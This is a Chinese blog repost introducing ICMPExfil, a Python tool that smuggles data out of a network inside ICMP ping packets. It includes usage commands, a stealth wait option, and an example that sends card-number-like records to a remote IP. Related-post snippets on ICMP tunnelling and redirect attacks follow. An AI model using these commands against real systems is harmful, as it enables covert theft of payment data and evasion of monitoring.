ICMPExfil:一款基于ICMP的数据提取和过滤工具

已于 2023-03-13 15:31:44 修改
阅读量185 收藏
点赞数
文章标签: 服务器 linux 运维 web安全 网络安全
于 2023-02-28 19:14:00 首次发布
原文链接:https://www.freebuf.com/articles/database/357036.html
版权
ICMPExfil是一个利用ICMP协议进行数据传输和过滤的工具,适用于安全研究人员。该工具使用Python3编写,允许通过ASCII编码传递信息,支持自定义等待时间以提高隐蔽性。用户可以通过设置IP和使用verbose模式来交互式操作。示例中展示了如何通过客户端和服务器端进行数据传输。
摘要由CSDN通过智能技术生成

在这里插入图片描述

关于ICMPExfil

ICMPExfil是一款基于ICMP的数据提取和过滤工具,该工具可以帮助广大研究人员通过有效的ICMP数据包传输数据。我们可以使用客户端脚本来传递希望过滤的数据,然后再通过目标设备将数据传递到运行的服务器上。无论你是经验丰富的安全专家,还是功能强大的安全系统,都只能查看到有效的ICMP数据包,数据包的数据结构没有任何的安全问题,我们的数据也不会隐藏在ICMP数据包中,因此通过审查数据包并不能够查看到我们所要提取或过滤的数据。

工具下载

由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好Python 3环境。

接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/martinoj2009/ICMPExfil.git

工具使用

ASCII
该工具支持ASCII自负,我们可以过滤和提取任何使用ASCII自负表示的内容,例如字母和数字等。比如说,你使用了一个16位数字,那么你可以使用客户端脚本通过下列形式来将这16个数字传递给服务器:

./ping.py --ascii “4111111111111111”

发送给服务器
我们在设置服务器时,有两种选项,即–ip选项,或使用脚本中的ipToPing选项来设置默认IP。

等待时间
如果你想提升任务操作的隐蔽性,你还可以使用–wait参数来指定等待的时间。如果你有足够的耐心,你可以将这个时间设置得比较长,这样就更加难以被发现了。

Verbose模式
如果你想要查看详细的工具运行信息,可以使用–show选项。

服务器开启/关闭
我们只需要运行下列命令即可启动服务器:

sudo python3 server.py

服务器运行之后,它需要根据接收数据的来源来映射输入。

当你完成任务之后,直接按下Ctrl + C组合键即可终止工具运行。

工具使用样例

我已提前将一些16位数字存储到了一个名为file的文件中,接下来执行下列命令:

./ping.py --ip 1.2.3.4 --asciiFile file
file文件的内容如下:

4587965312457852 01/15 456 Martino Jones | 4567965382457452 03/16 236 Martino Joe
编码后的数据如下:

[‘0110100’, ‘0110101’, ‘0111000’, ‘0110111’, ‘0111001’, ‘0110110’, ‘0110101’, ‘0110011’, ‘0110001’, ‘0110010’, ‘0110100’, ‘0110101’, ‘0110111’, ‘0111000’, ‘0110101’, ‘0110010’, ‘0100000’, ‘0110000’, ‘0110001’, ‘0101111’, ‘0110001’, ‘0110101’, ‘0100000’, ‘0110100’, ‘0110101’, ‘0110110’, ‘0100000’, ‘1001101’, ‘1100001’, ‘1110010’, ‘1110100’, ‘1101001’, ‘1101110’, ‘1101111’, ‘0100000’, ‘1001010’, ‘1101111’, ‘1101110’, ‘1100101’, ‘1110011’, ‘0100000’, ‘1111100’, ‘0100000’, ‘0110100’, ‘0110101’, ‘0110110’, ‘0110111’, ‘0111001’, ‘0110110’, ‘0110101’, ‘0110011’, ‘0111000’, ‘0110010’, ‘0110100’, ‘0110101’, ‘0110111’, ‘0110100’, ‘0110101’, ‘0110010’, ‘0100000’, ‘0110000’, ‘0110011’, ‘0101111’, ‘0110001’, ‘0110110’, ‘0100000’, ‘0110010’, ‘0110011’, ‘0110110’, ‘0100000’, ‘1001101’, ‘1100001’, ‘1110010’, ‘1110100’, ‘1101001’, ‘1101110’, ‘1101111’, ‘0100000’, ‘1001010’, ‘1101111’, ‘1100101’, ‘0001010’]
服务器端计算偏移量:

Calculating offsets

4 5 8 7 9 6 5 3 1 2 4 5 7 8 5 2 0 1 / 1 5 4 5 6 M a r t i n o J o n e s | 4 5 6 7 9 6 5 3 8 2 4 5 7 4 5 2 0 3 / 1 6 2 3 6 M a r t i n o J o e

工具运行截图

在这里插入图片描述


在这里插入图片描述

小黑安全
关注
【内网学习笔记】6、ICMP隧道工具使用
TeamsSix 的 CSDN 空间
04-07 759
1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道,ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping 数据包。 因此我们便可以将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而绕过防火墙的限制。 2、建立 ICMP 隧道工具 用于建立 ICMP 隧道的工具常见有:ptunnel、icmpsh、icmptunnel 等 ptunnel ptunnel 全称 PingTunnel,Kali
linux icmp 时间戳过滤,centos – 使用firewalld阻止ICMP时间戳和时间戳回复
weixin_39593523的博客
05-16 1248
操作系统:CentOS 7.0根据安全扫描的结果,有人建议我们阻止ICMP时间戳&使用防火墙的时间戳回复消息(CVE-1999-0524).我已经使用firewalld为SSH设置了一些基本的IP过滤以及允许HTTPS,但我对此感到困惑.我唯一能想到的是firewall-cmd –add-icmp-block,但我找不到似乎与timestamp或timestamp回复相关的icmptype...
icmp(局域网工具)
06-18
一款适合用于局域网的工具,可以轻松查看局域网内的机子是否在线
html协议中目标端口,ICMP数据包的过滤主要基于()A、目标端口B、源端口C、消息源代码D、协议prot...
weixin_28994227的博客
06-09 711
ICMP数据包的过滤主要基于()A、目标端口B、源端口C、消息源代码D、协议prot更多相关问题They agreed to order ______ the waiter recommended to them.A.whomeverB.whoeverC.whicheverDAccording to the writer, the exactness of a science is partly ...
ICMP数据包-实战分析
Koma的主页
07-13 1万+
昨天有位学习网络编程的兄弟对于TCP/IP里一些协议与概念性的东西很模糊,想让我给他讲解一下ICMP。这不正有空,于是乎随手抓了个ICMP的包给他分析了一下: (前面这些概念性的东西,这是基础的,必看!) ICMP报文包含在IP数据报中,属于IP的一个用户,IP头部就在ICMP报文的前面。所以一个ICMP报文包括IP头部、ICMP头部和ICMP报文(见图表,ICMP报文的结构和几种常见
ICMP协议测试工具
08-26
本程序采用VC++ 6.0 设计完成,根据ICMP 协议原理设计网络模型和监听线程,对目标主机执行Ping 服务,是学习ICMP 协议的好例子
基于ICMP和TCP协议的网段扫描器
SkullSky的博客
08-18 1万+
1. 系统描述1.1. 设计目标进行网络管理时,常常需要确定当前网络中处理活动状态的主机。本设计的目标就是编制程序,利用ICMP的回送请求和回送应答消息,来发现指定网段中的活动主机,即ping消息的请求和应答。1.2. 设计功能编写程序,其功能是发送ICMP数据包,以获取指定网段中的活动主机,并将结果显示在标准输出上。程序具体要求如下: 1)用命令行形式运行:scanhost Start_
24 张图详解 ICMP :最常用的网络命令 ping 和 tracert
networktp的博客
05-22 4759
ICMP IP 是尽力传输的网络协议,提供的数据传输服务是不可靠的、无连接的,不能保证数据包能成功到达目的地。那么问题来了:如何确定数据包成功到达目的地? 这需要一个网络层协议,提供错误检测功能和报告机制功能,于是出现了 ICMP(互联网控制消息协议)。ICMP 的主要功能是,确认 IP 包是否成功送达目的地址,通知发送过程中 IP 包被丢弃的原因。有了这些功能,就可以检查网络是否正常、网络配置是否正确、设备是否异常等信息,方便进行网络问题诊断。 举个栗子:如果在传输过程中,发生了某个错误,设备便会..
实验一:ICMP重定向攻击
chuxuezheerer的博客
10-09 5529
实验原理: ICMP重定向信息是路由器向主机提供实时的路由信息,当一个主机收到ICMP重定向信息时,它就会根据这个信息来更新自己的路由表。由于缺乏必要的合法性检查,如果一个黑客想要被攻击的主机修改它的路由表,黑客就会发送ICMP重定向信息给被攻击的主机,让该主机按照黑客的要求来修改路由表。 在VMware虚拟环境中(Virtual Box不同),.2是充当网关的默认地址(通过route命令可以查看当前的网关和路由信息);所以攻击者可以冒充.2发出重定向包,通知受害者修改自己的网关为攻击者指定的gw地址;如果
Terrapin工程ICMP工具「Terrapin Works ICMP Tools」-crx插件
03-23
增加ICMP平台的工具。 在Chrome浏览器中添加工具并修改MakerBot创新中心管理平台的管理后端上的元素,以提供更简化的管理员用户体验。 ===当前功能=== Omnibox命令•添加了Omnibox命令以按请求号搜索ICMP。 ===示例===多功能框命令•在多功能框中键入“ ic”并单击[TAB],然后键入ICMP请求编号并单击[Enter]。 ===在开发中===请求搜索•直接在ICMP管理界面中实现请求搜索(按请求编号)功能。 支持语言:English
TCP/UDP/ICMP/IGMP发包工具
03-12
可以制作各种IP数据,自定义L2 Header、L3 Header和L4 Header等,包括MAC、IP包头、报文内容定制等,通过该工具对指定的地点发送设置的数据,用于各种网络性能、特殊报文处理等测试。
icmp回复报文_网络工程师必懂篇·ICMP工具
weixin_29447621的博客
01-09 1141
网络江湖上有着南北两大武林,南武林以ping为尊,据说一ping在手,天下我有,可以通过ping命令探测到到达网络江湖各个节点的连通性,深得各个江湖中工程师的爱戴。 北武林则以tracert为尊,tracert年少时喜欢过一个名叫思科的姑娘,只是后来两个人分开了,思科与其分开之后,对其念念不忘,于是创立了一个traceroute的宗门,但两者其实是一样的,同宗同源。 这一日,又到南北江湖划...
再谈突破TCP-IP过滤/防火墙进入内网(icmp篇)
SHOOOW博客
02-15 2724
一、现状随着Internet网络的普及,各个中大型公司均建立了自己的局域网络,并与Internet相连接,而公司内部人员上网的限制也逐渐成为一个大家关心的话题。目前最为流行的网络工具大多是基于IP协议的,而其中最主要的两个协议就是TCP和UDP协议。HTTP,FTP等上层协议均是建立在TCP协议之上了,而DNS,ICQ,TFTP等则是建立在UDP协议之上的。往往我们会遇到这样情况:公司禁止了UDP
[HCNA] ICMP协议和工具介绍
weixin_42728126的博客
02-08 1137
0x0 ICMP协议的介绍 ICMP协议(英特网信息管理协议):在这个协议中提供了对网络运行状态进行检测的工具,我们可以通过该协议中提供的工具去收集网络的相关信息。 0x1 ICMP协议中的工具 1.ping :可以帮助我们检测网络中不同节点的IP连通性,在ping命令后面既可以跟IP地址,可以跟上域名,ping通就可以收到目标节点的应答。 2. tracert:可以跟踪网络中从源节点到目标节...
netfilter/hook关于ICMP协议过滤的样例
chn475111的博客
09-07 1382
#include #include #include #include #include #include #include #include #include #include #include #include #include MODULE_LICENSE("GPL"); MODULE_AUTHOR("ljk@xdja.com"); MODULE_DESCRIPT
ICMP协议
bobi1024的博客
12-31 306
ICMP协议一.概述二.PING二.Tracert/Traceroute的原理 一.概述 互联网信息控制协议,Internet Control Message Protocol用于实现链路连通性测试和链路追踪,可以实现链路差错报告。ICMP运行在传输层协议,服务于IP协议。 ICMP工具(基于ICMP协议开发的软件): Ping Traceroute/Tracert 二.PING 探测目的主机是否有问题,探测本地到目的的延迟等 Echo request 回显请求 Echo reply 回显应
python scapy sniff定向抓包_如何使用scapy sniff-function过滤ICMPv6数据包?
weixin_35919125的博客
02-19 888
我有一些问题要在我的系统上运行,但结果是我的一个接口上的错误v6设置 . scapy-python3确实似乎更好地处理了这个问题,它只是忽略了我的配置错误并继续执行而不是错误输出 .在我解决了你的代码示例在python 2.7和3.x上运行时没有任何问题 . 当我手动指定界面和不指定界面时 .Ether / IPv6 / ICMPv6 Echo Request (id: 0x5d24 seq: ...
WireShark如何抓包,各种协议(HTTP、ARP、ICMP)的过滤或分析,用WireShark实现TCP三次握手和四次挥手
热门推荐
宝藏女孩的成长日记
03-09 2万+
wireshark是非常流行的网络封包分析软件,功能十分强大。可以截取各种网络封包,显示网络封包的详细信息。常用来检测网络问题、攻击溯源、或者分析底层通信机制。
20222928 2022-2023-2 《网络攻防实践》第5次作业
最新发布
qq_43791615的博客
04-04 832
20222928 2022-2023-2 《网络攻防实践》第5次作业
IP数据报详解:转发规则与ICMP重定向
本资源主要关注TCP/IP协议中的IP数据报转发和ICMP重定向机制。在TCP/IP体系结构中,IP数据报的转发行为通常由系统内部的配置决定。在伯克利派生的系统中,如BSD/386和SVR4,数据报是否转发取决于`ip_forwarding`内核...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值